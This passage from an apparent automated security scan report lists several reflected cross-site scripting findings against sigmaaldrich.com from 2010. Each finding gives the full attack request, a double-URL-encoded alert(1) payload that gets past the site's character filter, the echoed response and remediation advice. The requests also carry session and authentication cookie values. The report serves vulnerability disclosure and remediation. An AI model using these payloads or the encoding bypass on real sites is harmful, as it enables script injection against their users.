Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:52 GMT
Content-Length: 29001
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content1e6a2";alert(1)//a640488014b/sigma-aldrich/areas-of-interest/analytical-chromatography/fluka-analytical/customware-oem","E404") ;
   </script>
...[SNIP]...

1.83. http://www.sigmaaldrich.com/content/sigma-aldrich/areas-of-interest/analytical-chromatography/fluka-analytical/customware-oem [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/areas-of-interest/analytical-chromatography/fluka-analytical/customware-oem

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1c9b8%2522%253balert%25281%2529%252f%252ff71090fe4b5 was submitted in the REST URL parameter 2. This input was echoed as 1c9b8";alert(1)//f71090fe4b5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrich1c9b8%2522%253balert%25281%2529%252f%252ff71090fe4b5/areas-of-interest/analytical-chromatography/fluka-analytical/customware-oem HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:54 GMT
Content-Length: 29001
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrich1c9b8";alert(1)//f71090fe4b5/areas-of-interest/analytical-chromatography/fluka-analytical/customware-oem","E404") ;
   </script>
...[SNIP]...

1.84. http://www.sigmaaldrich.com/content/sigma-aldrich/areas-of-interest/analytical-chromatography/fluka-analytical/customware-oem [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/areas-of-interest/analytical-chromatography/fluka-analytical/customware-oem

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b90ad%2522%253balert%25281%2529%252f%252f854402a9ab3 was submitted in the REST URL parameter 3. This input was echoed as b90ad";alert(1)//854402a9ab3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrich/areas-of-interestb90ad%2522%253balert%25281%2529%252f%252f854402a9ab3/analytical-chromatography/fluka-analytical/customware-oem HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:57 GMT
Content-Length: 29001
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrich/areas-of-interestb90ad";alert(1)//854402a9ab3/analytical-chromatography/fluka-analytical/customware-oem","E404") ;
   </script>
...[SNIP]...

1.85. http://www.sigmaaldrich.com/content/sigma-aldrich/areas-of-interest/analytical-chromatography/fluka-analytical/customware-oem [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/areas-of-interest/analytical-chromatography/fluka-analytical/customware-oem

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 36c27%2522%253balert%25281%2529%252f%252f7975ddc7b5f was submitted in the REST URL parameter 4. This input was echoed as 36c27";alert(1)//7975ddc7b5f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrich/areas-of-interest/analytical-chromatography36c27%2522%253balert%25281%2529%252f%252f7975ddc7b5f/fluka-analytical/customware-oem HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:58 GMT
Content-Length: 29001
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrich/areas-of-interest/analytical-chromatography36c27";alert(1)//7975ddc7b5f/fluka-analytical/customware-oem","E404") ;
   </script>
...[SNIP]...

1.86. http://www.sigmaaldrich.com/content/sigma-aldrich/areas-of-interest/analytical-chromatography/fluka-analytical/customware-oem [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/areas-of-interest/analytical-chromatography/fluka-analytical/customware-oem

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ae422%2522%253balert%25281%2529%252f%252fbd23f0de004 was submitted in the REST URL parameter 5. This input was echoed as ae422";alert(1)//bd23f0de004 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 5 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrich/areas-of-interest/analytical-chromatography/fluka-analyticalae422%2522%253balert%25281%2529%252f%252fbd23f0de004/customware-oem HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:01 GMT
Content-Length: 29001
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrich/areas-of-interest/analytical-chromatography/fluka-analyticalae422";alert(1)//bd23f0de004/customware-oem","E404") ;
   </script>
...[SNIP]...

1.87. http://www.sigmaaldrich.com/content/sigma-aldrich/areas-of-interest/analytical-chromatography/fluka-analytical/customware-oem [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/areas-of-interest/analytical-chromatography/fluka-analytical/customware-oem

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 12939%2522%253balert%25281%2529%252f%252f16e13dff68c was submitted in the REST URL parameter 6. This input was echoed as 12939";alert(1)//16e13dff68c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 6 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrich/areas-of-interest/analytical-chromatography/fluka-analytical/customware-oem12939%2522%253balert%25281%2529%252f%252f16e13dff68c HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
